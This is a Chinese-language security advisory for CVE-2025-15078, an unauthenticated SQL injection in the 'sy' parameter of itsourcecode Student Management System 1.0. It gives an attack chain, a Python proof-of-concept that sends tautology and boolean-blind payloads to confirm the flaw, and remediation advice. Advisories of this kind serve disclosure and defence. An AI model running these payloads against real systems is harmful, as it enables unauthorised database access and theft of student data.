CVE-2025-15078 CVSS 7.3 高危

CVE-2025-15078 itsourcecode学生管理系统/list_report.php SQL注入漏洞

披露日期: 2025-12-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-15078

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

itsourcecode Student Management System 1.0

漏洞概述

CVE-2025-15078是itsourcecode学生管理系统1.0版本中的一个高危SQL注入漏洞。该漏洞存在于/list_report.php文件中，攻击者可以通过sy参数注入恶意SQL语句，无需任何认证即可利用此漏洞。CVSS评分7.3，属于高危级别，攻击复杂度低，可远程利用。此漏洞影响系统的机密性、完整性和可用性，可能导致敏感数据泄露、数据库被篡改或服务中断。itsourcecode是一个提供免费源代码下载的平台，其学生管理系统存在多个安全漏洞。该漏洞已公开披露并可能被恶意利用，建议尽快采取修复措施。

技术细节

该SQL注入漏洞位于itsourcecode学生管理系统的/list_report.php文件中的sy参数。攻击者可通过构造恶意的SQL语句来操控数据库查询。由于系统未对用户输入进行充分的过滤和参数化查询，攻击者可以利用UNION SELECT、布尔盲注或时间盲注等技术来获取数据库中的敏感信息。攻击无需认证即可进行，可远程发起。成功利用此漏洞可能获取学生个人信息、成绩数据、管理员凭据等敏感数据，甚至可能通过OUTFILE等函数写入恶意文件实现远程代码执行。建议使用参数化查询或预编译语句来修复此漏洞，并对所有用户输入进行严格的输入验证。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标系统为itsourcecode Student Management System 1.0，确认/list_report.php文件存在

STEP 2

步骤2: 漏洞探测

通过sy参数发送SQL注入测试载荷，验证漏洞存在性

STEP 3

步骤3: 数据提取

利用UNION注入或盲注技术从数据库中提取敏感信息，包括用户凭据、学生数据等

STEP 4

步骤4: 权限提升

获取管理员账户后可能进一步控制整个系统或获取服务器权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-15078 PoC - SQL Injection in /list_report.php
# Target: itsourcecode Student Management System 1.0
# Parameter: sy

def exploit(target_url):
    # Basic SQL injection test
    payload = "' OR '1'='1"
    params = {'sy': payload}
    
    try:
        response = requests.get(target_url + '/list_report.php', params=params, timeout=10)
        print(f"[*] Sending payload: {payload}")
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response Length: {len(response.text)}")
        
        if 'error' not in response.text.lower() and response.status_code == 200:
            print("[+] Possible vulnerable endpoint detected")
        
        # Blind boolean injection test
        true_payload = "' AND 1=1 -- -"
        false_payload = "' AND 1=2 -- -"
        
        r_true = requests.get(target_url + '/list_report.php', params={'sy': true_payload})
        r_false = requests.get(target_url + '/list_report.php', params={'sy': false_payload})
        
        if len(r_true.text) != len(r_false.text):
            print("[+] Blind SQL Injection confirmed!")
            print(f"[+] True response length: {len(r_true.text)}")
            print(f"[+] False response length: {len(r_false.text)}")
            
    except requests.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} http://target.com")
        sys.exit(1)
    exploit(sys.argv[1])

影响范围

itsourcecode Student Management System 1.0

防御指南

临时缓解措施

立即停止使用受影响版本，采用参数化查询重构/list_report.php中的数据库操作代码。对所有用户输入进行白名单验证，使用Web应用防火墙过滤恶意SQL注入请求。限制数据库账户权限，避免使用DBA或管理员权限账户连接应用数据库。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15078
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15078
3 Details https://www.cvedetails.com/cve/CVE-2025-15078/
4 VulDB https://vuldb.com/cve/CVE-2025-15078
5 Link https://github.com/BUPT424201/CVE/issues/3
6 Link https://itsourcecode.com/
7 Link https://vuldb.com/?ctiid.338335
8 Link https://vuldb.com/?id.338335
9 Link https://vuldb.com/?submit.721485

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表